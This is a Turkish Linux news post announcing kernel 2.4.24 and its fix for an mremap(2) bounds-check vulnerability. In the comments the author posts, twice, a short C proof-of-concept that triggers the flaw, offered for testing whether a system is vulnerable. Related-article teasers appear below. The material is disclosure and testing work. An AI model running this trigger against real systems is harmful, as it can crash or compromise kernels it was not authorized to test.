Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Novell, SuSe 9.1`i duyurdu
yuxel
19 Mart 2004, 1 dakika okuma süresi

Novell, Gnu/Linux 2.6 ile gelen ilk ticari dağıtım olma özelliğine sahip olan SuSe 9.1'i duyurdu. Kişisel sürümü $29.95, profesyonel sürümü ise $89.95 'den satılacak olan 9.1, Gnome 2.4.2 ve KDE 3.2.1 masaüstü ortamlarını içeriyor. Dağıtımda ayrıca Softmaker firmasında üretilen TextMaker(kelime işlemci) ve Planmaker(tablolama) ofis programları da gelmekte.
Slashdot | Newsforge | Eweek | Madpenguin

Linux Kernel Fonksiyonlarını 'Hook'lamak
anonim
7 Şubat 2008, 1 dakika okuma süresi

Linux çekirdeğindeki bir fonksiyonun işleyişini ona zarar vermeden değiştirmek istediğimizi düşünelim. Kaynak kodları değiştirir tekrar derleriz ancak bu yazıda daha farklı bir yöntem izleyecegiz ve hafızadaki kernel'a tamamen geçici bir yama yapacağız.

Linux 2.6´nın Harika Dünyası
FZ
21 Temmuz 2003, 1 dakika okuma süresi

Linux çekirdeği 1991 yılında Finlandiya´lı Linus Torvalds tarafından yüksek lisans projesi olarak başlatılmış, Minix benzeri bir işletimi sisteminin 80386 işlemcili PC´ler üzerinde çalışması hedeflenmişti. Linus´un bu proje için aklına gelen ilk isim Freax idi ve neyse ki bundan çok kısa sürede vazgeçti. Çekirdeğin ilk kararlı sürümü olan Linux 1.0, Mart 1994´te dünya kamuoyuna açık kodlu ve bedelsiz olarak sunuldu. O sırada resmen sadece i386 mimarisini ve tek işlemcili makinaları destekliyordu.

Sene 2003, yaklaşık 9 yıl sonra Linux 2.6 binlerce gönüllü ve çalışkan yazılım ve donanım uzmanının çabaları sonucunda yine kamuoyuna sunulmak üzere.

LINUXnet'in 2. sayısı bayilerde
MaXCoDeR
11 Ekim 2004, 1 dakika okuma süresi

Türkiye'nin ilk ve tek Linux dergisi LINUXnet'in 2. sayısı bayilerde! LINUXnet yeni sayısında %10 daha kalın, bir CD daha fazla hediyeli.

LINUXnet'in hediyesi toplam 6 CD'de Mandrakelinux 10.1 Community, SUSE 9.1 Personal, Knoppix 3.6 ve LINUXnet Özel CD'si yer alıyor.

Derginin tüm içeriğini görmek için www.linuxnet.com.tr adresini ziyaret edebilirsiniz.

Massachusetts eyaleti Linux’a geçiyor
sametc
29 Eylül 2003, 1 dakika okuma süresi

www.ntvmsnbc.com'da yayınlanan habere göre Massachusetts eyaleti kurumsal bilgisayarlarında Linux işletim sistemi kullanılacağını belirtti. Böylece, ABD’de Linux’a geçen ilk eyalet oluyor.
Massachusetts eyaleti daha önce de Microsoft’a karşı tekel davası açmıştı. Haberin devamı...